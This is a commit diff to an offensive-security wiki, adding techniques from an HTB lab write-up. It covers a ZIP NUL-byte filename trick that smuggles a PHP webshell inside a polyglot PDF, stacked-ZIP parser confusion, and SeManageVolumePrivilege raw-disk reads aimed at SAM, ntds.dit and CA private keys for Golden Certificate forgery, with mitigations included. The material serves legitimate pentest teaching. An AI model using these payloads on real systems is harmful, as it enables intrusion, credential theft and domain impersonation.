Add content from: HTB: Certificate

2025-10-10 18:36:50 +00:00 · 2025-10-04 18:37:16 +00:00 · 2025-10-04 18:37:16 +00:00 · 1ff304a6b2
commit 1ff304a6b2
parent 92cfae4d12
5 changed files with 171 additions and 2 deletions
--- a/src/SUMMARY.md
+++ b/src/SUMMARY.md
@ -266,6 +266,7 @@
  - [RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato](windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md)
  - [SeDebug + SeImpersonate copy token](windows-hardening/windows-local-privilege-escalation/sedebug-+-seimpersonate-copy-token.md)
  - [SeImpersonate from High To System](windows-hardening/windows-local-privilege-escalation/seimpersonate-from-high-to-system.md)
+  - [Semanagevolume Perform Volume Maintenance Tasks](windows-hardening/windows-local-privilege-escalation/semanagevolume-perform-volume-maintenance-tasks.md)
  - [Windows C Payloads](windows-hardening/windows-local-privilege-escalation/windows-c-payloads.md)
 - [Active Directory Methodology](windows-hardening/active-directory-methodology/README.md)
  - [Abusing Active Directory ACLs/ACEs](windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md)
--- a/src/pentesting-web/file-upload/README.md
+++ b/src/pentesting-web/file-upload/README.md
@ -400,6 +400,71 @@ For further details **check the original post in**: [https://blog.silentsignal.e
    :x!
    ```

+### ZIP NUL-byte filename smuggling (PHP ZipArchive confusion)
+
+When a backend validates ZIP entries using PHP’s ZipArchive but extraction writes to the filesystem using raw names, you can smuggle a disallowed extension by inserting a NUL (0x00) into the filename fields. ZipArchive treats the entry name as a C‑string and truncates at the first NUL; the filesystem writes the full name, dropping everything after the NUL.
+
+High-level flow:
+- Prepare a legitimate container file (e.g., a valid PDF) that embeds a tiny PHP stub in a stream so the magic/MIME stays a PDF.
+- Name it like `shell.php..pdf`, zip it, then hex‑edit the ZIP local header and central directory filename to replace the first `.` after `.php` with `0x00`, resulting in `shell.php\x00.pdf`.
+- Validators that rely on ZipArchive will “see” `shell.php .pdf` and allow it; the extractor writes `shell.php` to disk, leading to RCE if the upload folder is executable.
+
+Minimal PoC steps:
+```bash
+# 1) Build a polyglot PDF containing a tiny webshell (still a valid PDF)
+printf '%s' "%PDF-1.3\n1 0 obj<<>>stream\n<?php system($_REQUEST["cmd"]); ?>\nendstream\nendobj\n%%EOF" > embedded.pdf
+
+# 2) Trick name and zip
+cp embedded.pdf shell.php..pdf
+zip null.zip shell.php..pdf
+
+# 3) Hex-edit both the local header and central directory filename fields
+#    Replace the dot right after ".php" with 00 (NUL) => shell.php\x00.pdf
+#    Tools: hexcurse, bless, bvi, wxHexEditor, etc.
+
+# 4) Local validation behavior
+php -r '$z=new ZipArchive; $z->open("null.zip"); echo $z->getNameIndex(0),"\n";'
+# -> shows truncated at NUL (looks like ".pdf" suffix)
+```
+
+Notes
+- Change BOTH filename occurrences (local and central directory). Some tools add an extra data descriptor entry too – adjust all name fields if present.
+- The payload file must still pass server‑side magic/MIME sniffing. Embedding the PHP in a PDF stream keeps the header valid.
+- Works where the enum/validation path and the extraction/write path disagree on string handling.
+
+Mitigations
+- Reject any archive with NULs in entry names; normalize and canonicalize names prior to validation.
+- Use a single, consistent library for enumeration and extraction; never mix parsers.
+- Store uploads on non-executable storage; never serve directly from the extraction path.
+
+### Stacked/concatenated ZIPs (parser disagreement)
+
+Concatenating two valid ZIP files produces a blob where different parsers focus on different EOCD records. Many tools locate the last End Of Central Directory (EOCD), while some libraries (e.g., ZipArchive in specific workflows) may parse the first archive they find. If validation enumerates the first archive and extraction uses another tool that honors the last EOCD, a benign archive can pass checks while a malicious one gets extracted.
+
+PoC:
+```bash
+# Build two separate archives
+printf test > t1; printf test2 > t2
+zip zip1.zip t1; zip zip2.zip t2
+
+# Stack them
+cat zip1.zip zip2.zip > combo.zip
+
+# Different views
+unzip -l combo.zip   # warns about extra bytes; often lists entries from the last archive
+php -r '$z=new ZipArchive; $z->open("combo.zip"); for($i=0;$i<$z->numFiles;$i++) echo $z->getNameIndex($i),"\n";'
+```
+
+Abuse pattern
+- Create a benign archive (allowed type, e.g., a PDF) and a second archive containing a blocked extension (e.g., `shell.php`).
+- Concatenate them: `cat benign.zip evil.zip > combined.zip`.
+- If the server validates with one parser (sees benign.zip) but extracts with another (processes evil.zip), the blocked file lands in the extraction path.
+
+Mitigations
+- Reject archives with trailing bytes or multiple EOCDs; verify exactly one well‑formed archive.
+- Use the same parser for validation and extraction.
+- Disallow server‑side extraction to web‑served, executable folders; prefer offline processing with strict allowlists.
+
 ## ImageTragic

 Upload this content with an image extension to exploit the vulnerability **(ImageMagick , 7.0.1-1)** (form the [exploit](https://www.exploit-db.com/exploits/39767))
@ -455,5 +520,6 @@ How to avoid file type detections by uploading a valid JSON file even if not all
 - [0xdf – HTB Environment (UniSharp LFM upload → PHP RCE)](https://0xdf.gitlab.io/2025/09/06/htb-environment.html)
 - [HTB: Media — WMP NTLM leak → NTFS junction to webroot RCE → FullPowers + GodPotato to SYSTEM](https://0xdf.gitlab.io/2025/09/04/htb-media.html)
 - [Microsoft – mklink (command reference)](https://learn.microsoft.com/windows-server/administration/windows-commands/mklink)
+- [0xdf – HTB: Certificate (ZIP NUL-name and stacked ZIP parser confusion → PHP RCE)](https://0xdf.gitlab.io/2025/10/04/htb-certificate.html)

 {{#include ../../banners/hacktricks-training.md}}
--- a/src/windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.md
+++ b/src/windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.md
@ -4,7 +4,7 @@

 **This is a summary of the domain persistence techniques shared in [https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf](https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf)**. Check it for further details.

-## Forging Certificates with Stolen CA Certificates - DPERSIST1
+## Forging Certificates with Stolen CA Certificates (Golden Certificate) - DPERSIST1

 How can you tell that a certificate is a CA certificate?

@ -116,4 +116,6 @@ Practical knobs attackers may set for long-term domain persistence (see {{#ref}}

 - Microsoft KB5014754 – Certificate-based authentication changes on Windows domain controllers (enforcement timeline and strong mappings). https://support.microsoft.com/en-au/topic/kb5014754-certificate-based-authentication-changes-on-windows-domain-controllers-ad2c23b0-15d8-4340-a468-4d4f3b188f16
 - Certipy – Command Reference and forge/auth usage. https://github.com/ly4k/Certipy/wiki/08-%E2%80%90-Command-Reference
+- [0xdf – HTB: Certificate (SeManageVolumePrivilege to exfil CA keys → Golden Certificate)](https://0xdf.gitlab.io/2025/10/04/htb-certificate.html)
+
 {{#include ../../../banners/hacktricks-training.md}}
--- a/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md
@ -146,6 +146,16 @@ If you want to get a `NT SYSTEM` shell you could use:
 import-module psgetsys.ps1; [MyProcess]::CreateProcessFromParent(<system_pid>,<command_to_execute>)
 ```

+### SeManageVolumePrivilege
+
+This right (Perform volume maintenance tasks) allows opening raw volume device handles (e.g., \\.\C:) for direct disk I/O that bypasses NTFS ACLs. With it you can copy bytes of any file on the volume by reading the underlying blocks, enabling arbitrary file read of sensitive material (e.g., machine private keys in %ProgramData%\Microsoft\Crypto\, registry hives, SAM/NTDS via VSS). It’s particularly impactful on CA servers where exfiltrating the CA private key enables forging a Golden Certificate to impersonate any principal.
+
+See detailed techniques and mitigations:
+
+{{#ref}}
+semanagevolume-perform-volume-maintenance-tasks.md
+{{#endref}}
+
 ## Check privileges

 ```
@ -184,6 +194,8 @@ Full token privileges cheatsheet at [https://github.com/gtworek/Priv2Admin](http

 - Take a look to this table defining Windows tokens: [https://github.com/gtworek/Priv2Admin](https://github.com/gtworek/Priv2Admin)
 - Take a look to [**this paper**](https://github.com/hatRiot/token-priv/blob/master/abusing_token_eop_1.0.txt) about privesc with tokens.
+- Microsoft – Perform volume maintenance tasks (SeManageVolumePrivilege): https://learn.microsoft.com/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/perform-volume-maintenance-tasks
+- 0xdf – HTB: Certificate (SeManageVolumePrivilege → CA key exfil → Golden Certificate): https://0xdf.gitlab.io/2025/10/04/htb-certificate.html

 {{#include ../../banners/hacktricks-training.md}}

--- a/src/windows-hardening/windows-local-privilege-escalation/semanagevolume-perform-volume-maintenance-tasks.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/semanagevolume-perform-volume-maintenance-tasks.md
@ -0,0 +1,88 @@
+# SeManageVolumePrivilege: Raw volume access for arbitrary file read
+
+{{#include ../../banners/hacktricks-training.md}}
+
+## Overview
+
+Windows user right: Perform volume maintenance tasks (constant: SeManageVolumePrivilege).
+
+Holders can perform low-level volume operations such as defragmentation, creating/removing volumes, and maintenance IO. Critically for attackers, this right allows opening raw volume device handles (e.g., \\.\C:) and issuing direct disk I/O that bypasses NTFS file ACLs. With raw access you can copy bytes of any file on the volume even if denied by DACL, by parsing the filesystem structures offline or leveraging tools that read at the block/cluster level.
+
+Default: Administrators on servers and domain controllers.
+
+## Abuse scenarios
+
+- Arbitrary file read bypassing ACLs by reading the disk device (e.g., exfiltrate sensitive system-protected material such as machine private keys under %ProgramData%\Microsoft\Crypto\RSA\MachineKeys and %ProgramData%\Microsoft\Crypto\Keys, registry hives, DPAPI masterkeys, SAM, ntds.dit via VSS, etc.).
+- Bypass locked/privileged paths (C:\Windows\System32\…) by copying bytes directly from the raw device.
+- In AD CS environments, exfiltrate the CA’s key material (machine key store) to mint “Golden Certificates” and impersonate any domain principal via PKINIT. See link below.
+
+Note: You still need a parser for NTFS structures unless you rely on helper tools. Many off-the-shelf tools abstract the raw access.
+
+## Practical techniques
+
+- Open a raw volume handle and read clusters:
+
+<details>
+<summary>Click to expand</summary>
+
+```powershell
+# PowerShell – read first MB from C: raw device (requires SeManageVolumePrivilege)
+$fs = [System.IO.File]::Open("\\.\\C:",[System.IO.FileMode]::Open,[System.IO.FileAccess]::Read,[System.IO.FileShare]::ReadWrite)
+$buf = New-Object byte[] (1MB)
+$null = $fs.Read($buf,0,$buf.Length)
+$fs.Close()
+[IO.File]::WriteAllBytes("C:\\temp\\c_first_mb.bin", $buf)
+```
+
+```csharp
+// C# (compile with Add-Type) – read an arbitrary offset of \\.\nusing System;
+using System.IO;
+class R {
+  static void Main(string[] a){
+    using(var fs = new FileStream("\\\\.\\C:", FileMode.Open, FileAccess.Read, FileShare.ReadWrite)){
+      fs.Position = 0x100000; // seek
+      var buf = new byte[4096];
+      fs.Read(buf,0,buf.Length);
+      File.WriteAllBytes("C:\\temp\\blk.bin", buf);
+    }
+  }
+}
+```
+
+</details>
+
+- Use an NTFS-aware tool to recover specific files from raw volume:
+  - RawCopy/RawCopy64 (sector-level copy of in-use files)
+  - FTK Imager or The Sleuth Kit (read-only imaging, then carve files)
+  - vssadmin/diskshadow + shadow copy, then copy target file from the snapshot (if you can create VSS; often requires admin but commonly available to the same operators that hold SeManageVolumePrivilege)
+
+Typical sensitive paths to target:
+- %ProgramData%\Microsoft\Crypto\RSA\MachineKeys\
+- %ProgramData%\Microsoft\Crypto\Keys\
+- C:\Windows\System32\config\SAM, SYSTEM, SECURITY (local secrets)
+- C:\Windows\NTDS\ntds.dit (domain controllers – via shadow copy)
+- C:\Windows\System32\CertSrv\CertEnroll\ (CA certs/CRLs; private keys live in the machine key store above)
+
+## AD CS tie‑in: Forging a Golden Certificate
+
+If you can read the Enterprise CA’s private key from the machine key store, you can forge client‑auth certificates for arbitrary principals and authenticate via PKINIT/Schannel. This is often referred to as a Golden Certificate. See:
+
+{{#ref}}
+../active-directory-methodology/ad-certificates/domain-persistence.md
+{{#endref}}
+
+(Section: “Forging Certificates with Stolen CA Certificates (Golden Certificate) – DPERSIST1”).
+
+## Detection and hardening
+
+- Strongly limit assignment of SeManageVolumePrivilege (Perform volume maintenance tasks) to only trusted admins.
+- Monitor Sensitive Privilege Use and process handle opens to device objects like \\.\C:, \\.\PhysicalDrive0.
+- Prefer HSM/TPM-backed CA keys or DPAPI-NG so that raw file reads cannot recover key material in usable form.
+- Keep uploads, temp, and extraction paths non-executable and separated (web context defense that often pairs with this chain post‑exploitation).
+
+## References
+
+- Microsoft – Perform volume maintenance tasks (SeManageVolumePrivilege): https://learn.microsoft.com/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/perform-volume-maintenance-tasks
+- 0xdf – HTB: Certificate (SeManageVolumePrivilege used to read CA key → Golden Certificate): https://0xdf.gitlab.io/2025/10/04/htb-certificate.html
+
+{{#include ../../banners/hacktricks-training.md}}